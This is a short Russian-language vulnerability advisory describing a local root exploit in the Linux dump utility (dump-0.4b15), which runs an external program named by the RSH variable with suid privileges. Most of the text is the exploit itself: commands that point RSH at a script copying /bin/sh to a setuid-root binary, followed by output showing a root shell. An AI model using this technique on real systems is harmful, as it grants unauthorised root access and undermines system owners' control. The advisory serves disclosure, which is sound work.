Команды Linux’а dump и restore выполняют внешнюю программу с suid привилегией. Этот факт позволяет местным пользователям получать r00t привилегии простой модификацией выполненной оболочки (параметр RSH)

Системы уязвимы:
dump-0.4b15

Эксплоит:
$ export TAPE=garbage:garbage
$ export RSH=/home/mat/execute_this
$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
$ chmod 755 /home/mat/execute_this
$ /sbin/dump -0 /

  DUMP: Connection to garbage established.
  DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
  DUMP: Date of last level 0 dump: the epoch
  DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
  DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
$ ls -la /home/mat/sh

 -rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
$ /home/mat/sh

bash# id
 uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)



Оставить мнение